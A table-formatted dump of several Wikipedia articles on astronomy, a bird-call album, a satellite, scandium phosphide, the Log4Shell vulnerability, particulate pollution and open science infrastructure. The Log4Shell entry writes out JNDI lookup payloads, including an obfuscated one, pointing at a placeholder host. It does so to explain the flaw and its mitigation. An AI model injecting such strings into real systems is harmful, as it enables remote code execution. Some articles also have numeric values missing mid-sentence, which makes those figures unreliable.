id int64 39 79M | url stringlengths 31 227 | text stringlengths 6 334k | source stringlengths 1 150 ⌀ | categories listlengths 1 6 | token_count int64 3 71.8k | subcategories listlengths 0 30 |
|---|---|---|---|---|---|---|
69,475,198 | https://en.wikipedia.org/wiki/GP%20Comae%20Berenices | GP Comae Berenices, abbreviated to GP Com and also known as G 61-29, is a star system composed of a white dwarf orbited by a planetary mass object, likely the highly eroded core of another white dwarf star. The white dwarf is slowly accreting material from its satellite at a rate of /year and was proven to be a low-activity AM CVn star. The star system is showing signs of a high abundance of ionized nitrogen from the accretion disk around the primary.
Planetary system
The material emitted from the planetary mass companion is mostly helium, with a molar ratio of nitrogen up to 1.7%, very low neon levels and other elements not detectable at all. Approximately half of the luminosity of the system comes from the accretion disk. The planetary object is suspected to contain a strange quark matter core due to its unusually high density, which must be above to prevent tidal disruption; the theoretical bound for planets composed solely of ordinary matter is on the order of . The object's orbit is expected to decay within 100 million years due to gravitational wave emission.
References
AM CVn stars
White dwarfs
Planetary systems with one confirmed planet
Coma Berenices
J13054243+1801039
Comae Berenices, GP | GP Comae Berenices | [
"Astronomy"
] | 263 | [
"Coma Berenices",
"Constellations"
] |
69,476,862 | https://en.wikipedia.org/wiki/Australian%20Bird%20Calls | Australian Bird Calls (also referred to as Songs of Disappearance: Australian Bird Calls and just Songs of Disappearance) is an album of Australian bird calls, released on 3 December 2021 by the Bowerbird Collective and BirdLife Australia. It was created to bring attention to endangered and threatened species of Australian birds. The recordings were made by nature recordist David Stewart and Nature Sound.
Following its physical release, Australian Bird Calls peaked at number two on the Australian ARIA Charts.
Although the title initially appeared as Songs of Disappearance, this later became the de facto "artist" name for the Bowerbird Collective's effort to bring attention to threatened and endangered Australian species, with the album itself then taking on the title of Australian Bird Calls as a "sequel" album of frog calls titled Australian Frog Calls, attributed to Songs of Disappearance, was released on 2 December 2022.
Background
The album came from an idea by Anthony Albrecht, a PhD student at Charles Darwin University and co-founder of the Bowerbird Collective, and his supervisor Stephen Garnett, who wrote the report The Action Plan for Australian Birds 2020, published in December 2021, which found one in six (216 out of 1,299) Australian bird species are threatened. Garnett's report, released in collaboration with BirdLife Australia, further identified 50 species of Australian birds closest to "facing extinction due to lack of policy support and rampant climate change".
Violinist Simone Slattery, the other co-founder of Bowerbird Collective, arranged the first track, a collage of the 53 bird songs recorded by David Stewart over four decades. Slattery said she kept listening to the isolated bird calls until a structure came to mind "like a quirky dawn chorus. Some of these sounds will shock listeners because they're extremely percussive, they're not melodious at all. They're clicks, they're rattles, they're squawks and deep bass notes." The Guardian noted the "morse code-like song" of the night parrot, which had not been heard until 2013, as well as the call of the regent honeyeater, a bird now considered "so rare that it is literally losing its own voice out of loneliness".
BirdLife Australia CEO Paul Sullivan called the album "some rare recordings of birds that may not survive if we don't come together to protect them. While this campaign is fun, there's a serious side to what we're doing, and it's been heartening to see bird enthusiasts showing governments and businesses that Australians care about these important birds."
Reception
A staff writer at The Music gave the album four-and-a-half out of five stars and posted a review consisting entirely of bird noises.
Commercial performance
The album debuted at number five on the Australian ARIA Albums Chart dated 13 December 2021, selling over 2,000 units, with 1,500 of those being pre-ordered copies. The following week, it ascended to number three. It later re-entered at number two.
Track listing
Charts
Release history
References
External links
Official website
2021 albums
Animal sounds | Australian Bird Calls | [
"Biology"
] | 631 | [
"Ethology",
"Behavior",
"Animal sounds"
] |
69,478,068 | https://en.wikipedia.org/wiki/Kosmos%202524 | Kosmos 2524 is a Russian reconnaissance satellite part of its ELINT Liana program. Developed and built by TsSKB Progress and KB Arsenal, it was launched on December 2, 2017. It is based on the Yantar satellite's bus.
Launch
Despite the launch failure of another Soyuz 2-1B rocket just four days before, Kosmos 2524 launched on December 2, 2017, from Plesetsk Cosmodrome Site 43 at 10:43 UTC. It was launched to a low Earth orbit with a periapsis of , an apoapsis of and an inclination of 67.1°, allowing it to cover much of the world.
References
2017 in spaceflight
Spacecraft launched in 2017
Satellites of Russia
Satellites in low Earth orbit
Reconnaissance satellites of Russia
Signals intelligence satellites | Kosmos 2524 | [
"Astronomy"
] | 160 | [
"Astronomy stubs",
"Spacecraft stubs"
] |
69,479,403 | https://en.wikipedia.org/wiki/5%20Trianguli | 5 Trianguli is a solitary star located in the northern constellation Triangulum. With an apparent magnitude of 6.23, it’s barely visible to the naked eye under ideal conditions. The star is located 399 light years away from the Solar System, but is drifting away with a radial velocity of 7.7 km/s.
5 Trianguli has a classification of A0 Vm, which states it’s an A-type main-sequence star with unusually strong metallic lines. It has 2.22 times the mass of the Sun and 2.96 times the radius of the Sun. 5 Trianguli radiates at 48 solar luminosities from its photosphere at an effective temperature of 8,836 kelvin, which gives it a white-hue of an A-type star. It has a low projected rotational velocity of 15 km/s, common for Am stars.
References
A-type main-sequence stars
Am stars
Triangulum
Trianguli, 5
0634
010220
013372 | 5 Trianguli | [
"Astronomy"
] | 215 | [
"Triangulum",
"Constellations"
] |
69,481,211 | https://en.wikipedia.org/wiki/Scandium%20phosphide | Scandium phosphide is an inorganic compound of scandium and phosphorus with the chemical formula .
Synthesis
ScP can be obtained by the reaction of scandium and phosphorus at 1000 °C.
Physical properties
This compound is calculated to be a semiconductor used in high power, high frequency applications and in laser diodes.
Chemical properties
ScP can be smelted with cobalt or nickel through electric arc to obtain ScCoP and ScNiP.
References
Phosphides
Scandium compounds
Semiconductors
Rock salt crystal structure | Scandium phosphide | [
"Physics",
"Chemistry",
"Materials_science",
"Engineering"
] | 104 | [
"Electrical resistance and conductance",
"Physical quantities",
"Semiconductors",
"Materials",
"Electronic engineering",
"Condensed matter physics",
"Solid state engineering",
"Matter"
] |
69,481,760 | https://en.wikipedia.org/wiki/Escherichia%20coli%20NC101 | Escherichia coli (AIEC) NC101 is a mouse isolate, serotype O2:H6/41, that is pro-carcinogenic, adherent-invasive (AIEC), probiotic strain of Escherichia coli, a species of bacteria that thrives in the intestines of mammals. NC101 has also been identified as a nicotinic acid (NA) auxotroph, a pathobiont, which is an organism that is harmful under certain circumstances, and is an important, relevant model organism that demonstrates how susceptible individuals may produce inappropriate immune responses to seemingly benign intestinal E. coli.
History
NC101 was first isolated and found from a specific pathogen-free wild-type mouse at the North Carolina State University between 2004 and 2005. Sequencing of NC101 showed it has a missense mutation in nadA, a gene that encodes for quinolinate synthase A, which is necessary for de novo nicotinamide adenine dinucleotide (NAD) biosynthesis.
Effects
E. coli NC101 has been found to promote carcinoma specifically, mucinous adenocarcinoma, in while performing experiments in azoxymethane treated mice. The findings of the study found "...tumorigenesis by altering microbial composition and inducing the expansion of microorganisms with genotoxic capabilities." The frequency of specific E. coli strains like NC101 in laboratory mouse colonies is currently unknown.
See also
Escherichia coli
Escherichia
Pseudomonadota
Enterobacteriacae
References
Carcinogenesis
Escherichia coli | Escherichia coli NC101 | [
"Biology"
] | 343 | [
"Model organisms",
"Escherichia coli"
] |
69,481,773 | https://en.wikipedia.org/wiki/Log4Shell | Log4Shell (CVE-2021-44228) is a zero-day vulnerability reported in November 2021 in Log4j, a popular Java logging framework, involving arbitrary code execution. The vulnerability had existed unnoticed since 2013 and was privately disclosed to the Apache Software Foundation, of which Log4j is a project, by Chen Zhaojun of Alibaba Cloud's security team on 24 November 2021.
Before an official CVE identifier was made available on 10 December 2021, the vulnerability circulated with the name "Log4Shell", given by Free Wortley of the LunaSec team, which was initially used to track the issue online. Apache gave Log4Shell a CVSS severity rating of 10, the highest available score. The exploit was simple to execute and is estimated to have had the potential to affect hundreds of millions of devices.
The vulnerability takes advantage of Log4j's allowing requests to arbitrary LDAP and JNDI servers, allowing attackers to execute arbitrary Java code on a server or other computer, or leak sensitive information. A list of its affected software projects has been published by the Apache Security Team. Affected commercial services include Amazon Web Services, Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent QQ and many others. According to Wiz and EY, the vulnerability affected 93% of enterprise cloud environments.
The vulnerability's disclosure received strong reactions from cybersecurity experts. Cybersecurity company Tenable said the exploit was "the single biggest, most critical vulnerability ever," Ars Technica called it "arguably the most severe vulnerability ever" and The Washington Post said that descriptions by security professionals "border on the apocalyptic."
Background
Log4j is an open-source logging framework that allows software developers to log data within their applications, and can include user input. It is used ubiquitously in Java applications, especially enterprise software. Originally written in 2001 by Ceki Gülcü, it is now part of Apache Logging Services, a project of the Apache Software Foundation. Tom Kellermann, a member of President Obama's Commission on Cyber Security, described Apache as "one of the giant supports of a bridge that facilitates the connective tissue between the worlds of applications and computer environments".
Behavior
The Java Naming and Directory Interface (JNDI) allows for lookup of Java objects at program runtime given a path to their data. JNDI can use several directory interfaces, each providing a different scheme of looking up files. Among these interfaces is the Lightweight Directory Access Protocol (LDAP), a non-Java-specific protocol which retrieves the object data as a URL from an appropriate server, either local or anywhere on the Internet.
In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form ${prefix:name}. For example, Text: ${java:version} might be converted to Text: Java version 1.7.0_67. Among the recognized expressions is ${jndi:<lookup>}; by specifying the lookup to be through LDAP, an arbitrary URL may be queried and loaded as Java object data. ${jndi:ldap://example.com/file}, for example, will load data from that URL if connected to the Internet. By inputting a string that is logged, an attacker can load and execute malicious code hosted on a public URL. Even if execution of the data is disabled, an attacker can still retrieve data—such as secret environment variables—by placing them in the URL, in which case they will be substituted and sent to the attacker's server. Besides LDAP, other potentially exploitable JNDI lookup protocols include its secure variant LDAPS, Java Remote Method Invocation (RMI), the Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP).
Because HTTP requests are frequently logged, a common attack vector is placing the malicious string in the HTTP request URL or a commonly logged HTTP header, such as User-Agent. Early mitigations included blocking any requests containing potentially malicious contents, such as ${jndi. Such basic string matching solutions can be circumvented by obfuscating the request: ${${lower:j}ndi, for example, will be converted into a JNDI lookup after performing the lowercase operation on the letter j. Even if an input, such as a first name, is not immediately logged, it may be later logged during internal processing and its contents executed.
Mitigation
Fixes for this vulnerability were released on 6 December 2021, three days before the vulnerability was published, in Log4j version 2.15.0-rc1. The fix included restricting the servers and protocols that may be used for lookups. Researchers discovered a related bug, CVE-2021-45046, that allows local or remote code execution in certain non-default configurations and was fixed in version 2.16.0, which disabled all features using JNDI and support for message lookups. Two more vulnerabilities in the library were found: a denial-of-service attack, tracked as CVE-2021-45105 and fixed in 2.17.0; and a difficult-to-exploit remote code execution vulnerability, tracked as CVE-2021-44832 and fixed in 2.17.1. For previous versions, the class org.apache.logging.log4j.core.lookup.JndiLookup needs to be removed from the classpath to mitigate both vulnerabilities. An early recommended fix for older versions was to set the system property log4j2.formatMsgNoLookups to true, but this change does not prevent exploitation of CVE-2021-45046 and was later found to not disable message lookups in certain cases.
Newer versions of the Java Runtime Environment (JRE) also mitigate this vulnerability by blocking remote code from being loaded by default, although other attack vectors still exist in certain applications. Several methods and tools have been published that help detect vulnerable Log4j versions used in built Java packages.
Where applying updated versions has not been possible, due to a variety of constraints such as lack of resources or third-party managed solutions, filtering outbound network traffic from vulnerable deployments has been the primary recourse for many. The approach is recommended by NCC Group and the National Cyber Security Centre (United Kingdom), and is an example of a defense in depth measure. The effectiveness of such filtering is evidenced by laboratory experiments conducted with firewalls capable of intercepting the egress traffic with several wholly or partially vulnerable versions of the library itself and the JRE.
Usage
The exploit allows hackers to gain control of vulnerable devices using Java. Some hackers employ the vulnerability to use victims' devices for cryptocurrency mining, creating botnets, sending spam, establishing backdoors and other illegal activities such as ransomware attacks. In the days following the vulnerability's disclosure, Check Point observed millions of attacks being initiated by hackers, with some researchers observing a rate of over one hundred attacks per minute that ultimately resulted with attempted attacks on over 40% of business networks internationally.
According to Cloudflare CEO Matthew Prince, evidence of exploitation of or scanning for the exploit goes back as early as 1 December, nine days before it was publicly disclosed. According to cybersecurity firm GreyNoise, several IP addresses were scraping websites to check for servers that had the vulnerability. Several botnets began scanning for the vulnerability, including the Muhstik botnet by 10 December, as well as Mirai and Tsunami. Ransomware group Conti was observed using the vulnerability on 17 December.
Some state-sponsored groups in China and Iran also utilized the exploit according to Check Point, but it is not known if the exploit was used by Israel, Russia or the United States prior to the disclosure of the vulnerability. Check Point said that on 15 December 2021, Iran-backed hackers attempted to infiltrate the networks of Israeli businesses and government institutions.
Response and impact
Governmental
In the United States, the director of the Cybersecurity and Infrastructure Security Agency (CISA), Jen Easterly, described the exploit as "one of the most serious I've seen in my entire career, if not the most serious", explaining that hundreds of millions of devices were affected and advising vendors to prioritize software updates. Civilian agencies contracted by the United States government had until 24 December 2021 to patch vulnerabilities. On 4 January, the Federal Trade Commission (FTC) stated its intent to pursue companies that fail to take reasonable steps to update used Log4j software. In a White House meeting, the importance of security maintenance of open-source software – often also carried out largely by few volunteers – to national security was clarified. While some open-source projects have many eyes on them, others do not have many or any people ensuring their security.
Germany's Bundesamt für Sicherheit in der Informationstechnik (BSI) designated the exploit as being at the agency's highest threat level, calling it an "extremely critical threat situation" (translated). It also reported that several attacks were already successful and that the extent of the exploit remained hard to assess. The Netherlands's National Cyber Security Centre (NCSC) began an ongoing list of vulnerable applications.
The Canadian Centre for Cyber Security (CCCS) called on organizations to take immediate action. The Canada Revenue Agency temporarily shut down its online services after learning of the exploit, while the Government of Quebec closed almost 4,000 of its websites as a "preventative measure." The Belgian Ministry of Defence experienced a breach attempt and was forced to shut down part of its network.
The Chinese Ministry of Industry and Information Technology suspended work with Alibaba Cloud as a cybersecurity threat intelligence partner for six months for failing to report the vulnerability to the government first.
Businesses
Research conducted by Wiz and EY showed that 93% of the cloud enterprise environment were vulnerable to Log4Shell. 7% of vulnerable workloads are exposed to the Internet and prone to wide exploitation attempts. According to the research, ten days after vulnerability disclosure (20 December 2021) only 45% of vulnerable workloads were patched on average in cloud environments. Amazon, Google and Microsoft cloud data was affected by Log4Shell. Microsoft asked Windows and Azure customers to remain vigilant after observing state-sponsored and cyber-criminal attackers probing systems for the Log4j 'Log4Shell' flaw through December 2021.
The human resource management and workforce management company UKG, one of the largest businesses in the industry, was targeted by a ransomware attack that affected large businesses. UKG said it did not have evidence of Log4Shell being exploited in the incident, though analyst Allan Liska from cybersecurity company Recorded Future said there was possibly a connection.
As larger companies began to release patches for the exploit, the risk for small businesses increased as hackers focused on more vulnerable targets.
Privacy
Some personal devices connected to the Internet, such as smart TVs and security cameras, were vulnerable to the exploit. Some software may never get a patch due to discontinued manufacturer support.
Analysis
almost half of all corporate networks globally have been actively probed, with over 60 variants of the exploit having been produced within 24 hours. Check Point Software Technologies in a detailed analysis described the situation as being "a true cyber-pandemic" and characterizing the potential for damage as being "incalculable". Several initial advisories exaggerated the amount of packages that were vulnerable, leading to false positives. Most notably, the "log4j-api" package was marked as vulnerable, while in reality further research showed that only the main "log4j-core" package was vulnerable. This was confirmed both in the original issue thread and by external security researchers.
Technology magazine Wired wrote that despite the previous "hype" surrounding multiple vulnerabilities, "the Log4j vulnerability... lives up to the hype for a host of reasons". The magazine explains that the pervasiveness of Log4j, the vulnerability being difficult to detect by potential targets and the ease of transmitting code to victims created a "combination of severity, simplicity, and pervasiveness that has the security community rattled". Wired also outlined stages of hackers using Log4Shell; cryptomining groups first using the vulnerability, data brokers then selling a "foothold" to cybercriminals, who finally go on to engage in ransomware attacks, espionage and destroying data.
Amit Yoran, CEO of Tenable and the founding director of the United States Computer Emergency Readiness Team, stated "[Log4Shell] is by far the single biggest, most critical vulnerability ever", noting that sophisticated attacks were beginning shortly after the bug, saying "We're also already seeing it leveraged for ransomware attacks, which, again, should be a major alarm bell ... We've also seen reports of attackers using Log4Shell to destroy systems without even looking to collect ransom, a fairly unusual behavior". Sophos's senior threat researcher Sean Gallagher said, "Honestly, the biggest threat here is that people have already gotten access and are just sitting on it, and even if you remediate the problem somebody's already in the network ... It's going to be around as long as the Internet."
According to a Bloomberg News report, some anger was directed at Apache's developers at their failure to fix the vulnerability after warnings about exploits of broad classes of software, including Log4j, were made at a 2016 cybersecurity conference.
References
External links
Log4j website
Common Vulnerabilities and Exposures page
National Vulnerabilities Database page
Projects affected by cve-2021-44228, by Apache Security Team
2021 in computing
Injection exploits
Computer security exploits | Log4Shell | [
"Technology"
] | 2,887 | [
"Computer security exploits",
"Injection exploits"
] |
69,482,866 | https://en.wikipedia.org/wiki/Particulate%20pollution | Particulate pollution is pollution of an environment that consists of particles suspended in some medium. There are three primary forms: atmospheric particulate matter, marine debris, and space debris. Some particles are released directly from a specific source, while others form in chemical reactions in the atmosphere. Particulate pollution can be derived from either natural sources or anthropogenic processes.
Atmospheric particulate matter
Atmospheric particulate matter, also known as particulate matter, or PM, describes solids and/or liquid particles suspended in a gas, most commonly the Earth's atmosphere. Particles in the atmosphere can be divided into two types, depending on the way they are emitted. Primary particles, such as mineral dust, are emitted into the atmosphere. Secondary particles, such as ammonium nitrate, are formed in the atmosphere through gas-to-particle conversion.
Sources
Some particulates occur naturally, originating from volcanoes, dust storms, forest and grassland fires, living vegetation and sea spray. Human activities, such as the burning of fossil fuels in vehicles, wood burning, stubble burning, power plants, road dust, wet cooling towers in cooling systems and various industrial processes, also generate significant amounts of particulates. Coal combustion in developing countries is the primary method for heating homes and supplying energy. Because salt spray over the oceans is the overwhelmingly most common form of particulate in the atmosphere, anthropogenic aerosols—those made by human activities—currently account for about 10 percent of the total mass of aerosols in our atmosphere.
Microplastics are an emerging source of atmospheric pollution, particularly fine plastic fibers that are light enough to be carried by the wind. Microplastics traveling in the air cannot be traced back to their specific original sources, as the wind can blow the infinitesimal particles thousands of miles from where they were originally shed. Microplastics are being found in very remote regions of the Earth, where there are no apparent nearby sources of plastic. A common source of airborne microplastic fibers is plastic textiles. While most atmospheric microplastics tend to come from land, microplastics are also entering the atmosphere through ocean and sea mist.
Domestic combustion and wood smoke
Domestic combustion pollution is mainly composed of burning fuel including wood, gas, and charcoal in activities of heating, cooking, agriculture, and wildfires. Major domestic pollutants contain 17% of carbon dioxide, 13% of carbon monoxide, 6% of nitrogen monoxide, polycyclic aromatic hydrocarbons, and fine and ultrafine particles.
In the United Kingdom domestic combustion is the largest single source of PM2.5 annually. In some towns and cities in New South Wales wood smoke may be responsible for 60% of fine particle air pollution in the winter. Research conducted about biomass burning in 2015, estimated that 38% of European total particulate pollution emissions are composed of domestic wood burning.
The particulate pollutant is often in microscopic size that enables it to infiltrate into interior space even if windows and doors are closed. The main component of woodsmoke, black carbon significantly appears in the indoor environment compared to other ambient pollutants. If the room is sealed tight enough to prevent woodsmoke transmission, it will also prevent oxygen exchange from indoors to outdoor. The regular dusk mask also can help little with particulate pollutants since they are designed to filter out larger particles. Musk with HEPA filter can filter out microscopic pollutants but cause difficulty of breathing to the population with lung disease.
Living under high concentrations of pollutants can lead to headaches, fatigue, lung disease, asthma, and throat and eye irritation. One of the most common diseases among those living among pollutants is chronic obstructive pulmonary disease (COPD). Exposure to wood and charcoal smoke is significantly associated with COPD diagnoses among those living in developing and developed countries. Exposure to woodsmoke intensifies the respiratory systems and increases the risk of hospital admissions.
Marine debris
Marine debris and marine aerosols refer to particulates suspended in a liquid, usually water on the Earth's surface. Particulates in water are a kind of water pollution measured as total suspended solids, a water quality measurement listed as a conventional pollutant in the U.S. Clean Water Act, a water quality law. Notably, some of the same kinds of particles can be suspended both in air and water, and pollutants specifically may be carried in the air and deposited in water, or fall to the ground as acid rain. The majority of marine aerosols are created through the bubble bursting of breaking waves and capillary action on the ocean surface due to the stress exerted from surface winds. Among common marine aerosols, pure sea salt aerosols are the major component of marine aerosols with an annual global emission between 2,000-10,000 teragrams annually. Through interactions with water, many marine aerosols help to scatter light, and aid in cloud condensation and ice nuclei (IN); thus, affecting the atmospheric radiation budget. When they interact with anthropogenic pollution, marine aerosols can affect biogeochemical cycles through the depletion of acids such as nitric acid and halogens.
Space debris
Space debris describes particulates in the vacuum of outer space, specifically particles originating from human activity that remain in geocentric orbit around the Earth. The International Association of Astronauts define space debris as "any man-made Earth orbiting object which is non-functional with no reasonable expectation of assuming or resuming its intended function or any other function for which it is or can be expected to be authorized, including fragments and parts thereof".
Space debris is classified by size and operational purpose, and divided into four main subsets: inactive payloads, operational debris, fragmentation debris and microparticulate matter. Inactive payloads refer to any launched space objects that have lost the capability to reconnect to its corresponding space operator; thus, preventing a return to Earth. In contrast, operational debris describes the matter associated with the propulsion of a larger entity into space, which may include upper rocket stages and ejected nose cones. Fragmentation debris refers to any object in space that has become dissociated from a larger entity by means of explosion, collision or deterioration. Microparticulate matter describes space matter that typically cannot be seen singly with the naked eye, including particles, gases, and spaceglow.
In response to research that concluded that impacts from Earth orbital debris could lead to greater hazards to spacecraft than the natural meteoroid environment, NASA began the orbital debris program in 1979, initiated by the Space Sciences branch at Johnson Space Center (JSC). Beginning with an initial budget of $70,000, the NASA orbital debris program began with the initial goals of characterizing hazards induced by space debris and creating mitigation standards that would minimize the growth of the orbital debris environment. By 1990, the NASA orbital debris program created a debris monitoring program, which included mechanisms to sample the low Earth orbit (LEO) environment for debris as small as 6mm using the Haystack X-band ground radar.
Epidemiology
Particulate pollution is observed around the globe in varying sizes and compositions and is the focus of many epidemiological studies. Particulate matter (PM) is generally classified into two main size categories: PM10 and PM2.5. PM10, also known as coarse particulate matter, consists of particles 10 micrometers (μm) and smaller, while PM2.5, also called fine particulate matter, consists of particles 2.5 μm and smaller. Particles 2.5 μm or smaller in size are especially notable as they can be inhaled into the lower respiratory system, and with enough exposure, absorbed into the bloodstream. Particulate pollution can occur directly or indirectly from a number of sources including, but not limited to: agriculture, automobiles, construction, forest fires, chemical pollutants, and power plants.
Exposure to particulates of any size and composition may occur acutely over a short duration, or chronically over a long duration. Particulate exposure has been associated with adverse respiratory symptoms ranging from irritation of the airways, aggravated asthma, coughing, and difficulty breathing from acute exposure to symptoms such as irregular heartbeat, lung cancer, kidney disease, chronic bronchitis, and premature death in individuals who suffer from pre-existing cardiovascular or lung diseases due to chronic exposure. The severity of health effects generally depends upon the size of the particles as well as the health status of the individual exposed; older adults, children, pregnant women, and immunocompromised populations are at the greatest risk for adverse health outcomes. Short-term exposure to particulate pollution has been linked to adverse health impacts.
As a result, the US Environmental Protection Agency (EPA) and various health agencies around the world have established thresholds for concentrations of PM2.5 and PM10 that are determined to be acceptable. However, there is no known safe level of exposure and thus, any exposure to particulate pollution is likely to increase an individual's risk of adverse health effects. In European countries, air quality at or above 10 micrograms per cubic meter of air (μg/m3) for PM2.5 increases the all-causes daily mortality rate by 0.2-0.6% and the cardiopulmonary mortality rate by 6-13%.
Worldwide, PM10 concentrations of 70 μg/m3 and PM2.5 concentrations of 35 μg/m3 have been shown to increase long-term mortality by 15%. More so, approximately 4.2 million of all premature deaths observed in 2016 occurred due to airborne particulate pollution, 91% of which occurred in countries with low to middle socioeconomic status. Of these premature deaths, 58% were attributed to strokes and ischaemic heart diseases, 8% attributed to COPD (Chronic Obstructive Pulmonary Disease), and 6% to lung cancer.
In 2006, the EPA conducted air quality designations in all 50 states, denoting areas of high pollution based on criteria such as air quality monitoring data, recommendations submitted by the states, and other technical information; and reduced the National Ambient Air Quality Standard for daily exposure to particulates in the 2.5 micrometers and smaller category from 15 μg/m3 to 12 μg/m3 in 2012. As a result, U.S. annual PM2.5 averages have decreased from 13.5 μg/m3 to 8.02 μg/m3, between 2000 and 2017.
Microplastics prove to be particularly concerning as particulate matter for their reactivity and ability to become contaminated. Microplastic particles, depending on their composition, can form carbonyl bonds on the surface, causing contaminants such as heavy metals to be adsorbed by the particle. When microplastic particles are inhaled, they persist in the lungs and cause inflammation. More research is needed to understand the long-term health effects of microplastics in the human body.
Environmental Risks
Particulate matter (PM), particularly PM2.5, was found to be harmful to aquatic invertebrates. These aquatic invertebrates include fish, crustaceans, and Mollusca. In a study by Han et al, the effects of PM<2.5 micrometers on life history traits and oxidative stress were observed in Tigriopus japonicus. Exposure to particulate matter of less than 2.5 micrometers in diameter led to significant changes in ROS levels, indicating that particulate matter exposure was a causative agent of oxidative stress in Tigriopus japonicus. In addition to aquatic invertebrates, negative effects of particulate matter have been noted in mammals as well. Following acute exposure to ambient particulate matter, rats showed a significant increase in neutrophils and a significant decrease in lymphocytes, indicating that particulate matter exposure can result in activation of the sympathetic stress response.
References
External links
Pollution
Atmospheric sciences
Environmental chemistry
Environmental science | Particulate pollution | [
"Chemistry",
"Environmental_science"
] | 2,461 | [
"Environmental chemistry",
"nan"
] |
69,485,463 | https://en.wikipedia.org/wiki/Open%20Science%20Infrastructure | Open Science Infrastructure (or open scholarly infrastructure) is an information infrastructure that supports the open sharing of scientific productions such as publications, datasets, metadata or code. In November 2021 the Unesco recommendation on Open Science describe it as "shared research infrastructures that are needed to support open science and serve the needs of different communities".
Open science infrastructures are a form of scientific infrastructure (also called cyberinfrastructure, e-Science or e-infrastructure) that support the production of open knowledge. Beyond the management of common resources, they are frequently structured as community-led initiatives with a set collective norms and governance regulations, which makes them also a form of knowledge commons. The definition of open science infrastructures usually exclude privately owned scientific infrastructures run by leading commercial publishers. Conversely it may include actors not always characterized as scientific infrastructures that play a critical role in the ecosystem of open science, such as publishing platforms in open access (open scholarly communication service).
Computing infrastructures and online services have played a key role in the production and diffusion of scientific knowledge since the 1960s. While these early scientific infrastructure were initially envisioned as community initiatives, they could not be openly used due to the lack of interconnectivity and the cost of network connection. The creation of the World Wide Web made it possible to share data and publications on a large scale. The sustainability of online research projects and services became a critical policy issue and entailed the development of major infrastructure in the 2000s.
The concept of open science infrastructure emerged after 2015 following a scientific policy debate over the expansion of commercial and privately owned infrastructures in numerous research activities and the publication of the Principles for Open Scholarly Infrastructures. Since the 2010s, large ecosystems of interconnected scientific infrastructures have emerged in Europe, South and North America through the development of new open science project and the conversion of legacy infrastructures to open science principles.
Definitions and terminology
Open science infrastructure is a form of knowledge infrastructure that makes it possible to create, publish and maintain open scientific outputs such as publication, data or software.
The Unesco recommendation of Open Science approved in November 2021 define open science infrastructures as "shared research infrastructures that are needed to support open science and serve the needs of different communities". The SPARC report on European Open Science Infrastructure include the following activities within the range of open science infrastructures: "We define Open Access & Open Science Infrastructure as sets of services, protocols, standards and software contributing to the research lifecycle – from collaboration and experimentation through data collection and storage, data organization, data analysis and computation, authorship, submission, review and annotation, copyediting, publishing, archiving, citation, discovery and more"
Infrastructure
The use of the term "infrastructure" is an explicit reference to the physical infrastructures and networks such as power grids, road networks or telecommunications that made it possible to run complex economic and social system after the industrial revolution: "The term infrastructure has been used since the 1920s to refer collectively to the roads, power grids, telephone systems, bridges, rail lines, and similar public works that are required for an industrial economy to function (…) If infrastructure is required for an industrial economy, then we could say that cyberinfrastructure is required for a knowledge economy". The concept of infrastructure was notably extended in 1996 to forms of computer-mediated knowledge production by Susan Leigh Star and Karen Ruhleder, through an empirical observation of an early form of open science infrastructure, the Worm Community System. This definition has remained influential through the next two decades in science and technology studies and has affected the policy debate over the building of scientific infrastructure since the early 2000s
Open science infrastructure have specific properties that contrast them with other forms of open science projects or initiatives:
Open science infrastructures are not simply a technical product but embed a set of tools, institutions and social norms. Consequently, infrastructures are not always visible as they can be largely hidden under the routine of normal activities The resilience and tacitness of the infrastructures makes it especially difficult to identify the real contributions and "labour cost" of open science work, as it remains "invisible in the university system". This make it also difficult to allocate funding effectively as critical infrastructure may remain undetected by funding bodies.
Open science infrastructures are durable and resilient. They are expected to run on a long-term basis and multiple research programs relies on. To some extent, infrastructure are successful when they are forgotten and become an integral part of routine research activities: "Infrastructure at its best is invisible. We tend to only notice it when it fails."
Open science infrastructures can be shared and used by different actors and communities. It must be sufficiently consistent to remain coordinated and yet it have to welcome a diverse array of local uses: "an infrastructure occurs when the tension between local and global is resolved". Predefined agreement on the scope and the governance of the infrastructure within all stakeholders is a critical step.
Openness and the commons
Open science infrastructures are open, which differentiate them with other scientific and knowledge infrastructure and, more specifically, with subscription-based commercial infrastructures. Openness is both a core value and a directing principle that affect the aims, the governance and the management of the infrastructure. Open science infrastructure face similar issues met by other open institutions such as open data repositories or large scale collaborative project such as Wikipedia: "When we study contemporary knowledge infrastructures we find values of openness often embedded there, but translating the values of openness into the design of infrastructures and the practices of infrastructuring is a complex and contingent process".
The conceptual definition of open science infrastructures has been largely influenced by the analysis of Elinor Ostrom on the commons and more specifically on the knowledge commons. In accordance with Ostrom, Cameron Neylon understates that open infrastructures are not only characterized by the management of a pool of common resources but also by the elaboration of common governance and norms. The economic theory of the commons make it possible to expand beyond the scope of limited scope of scholar associations toward large scale community-led initiatives: "Ostrom's work (…) provides a template (…) to make the transition from a local club to a community-wide infrastructure." Open science infrastructure tend to favor a non-for profit, publicly funded model with strong involvement from scientific communities, which disassociate them from privately owned closed infrastructures: "open infrastructures are often scholar-led and run by non-profit organisations, making them mission-driven instead of profit-driven." This status aims to ensure the autonomy of the infrastructure and prevent their incorporation into commercial infrastructure. It has wide range implications on the way the organization is managed: "the differences between commercial services and non-profit services permeated almost every aspect of their responses to their environment".
Open science infrastructures are not only a more specific subset of scientific infrastructures and cyberinfrastructures but may also include actors that would not fall into this definition. "Open access publication platforms" such as Scielo, OpenEdition or the Open Library of Humanities are considered an integral part of open science infrastructures in the UNESCO definition and in several literature review and policy reports, whereas they were usually considered as a separate entities in the policy debate on cyberinfrastructure and e-infrastructures. In the 2010 report of the European Commission on e-infrastructure, scientific publishing platforms are "not e-Infrastructures but closely related to it".
Open science infrastructures may also incorporate additional values and ethical principles. Samuel Moore has theorized a form of care-full scholarly commons that does not exist yet but would incorporate latent forms of open science infrastructure and communities: "In addition to sharing resources with other projects, commoning also requires commoners to adopt an outwardly-focused, generous attitude to other commons projects, redirecting their labour away from proprietary." In 2018, Okune et al. introduced a similar concept of "inclusive knowledge infrastructures" that "deliberately allow for multiple forms of participation amongst a diverse set of actors (…) and seek to redress power relations within a given context."
Principles for open science infrastructures
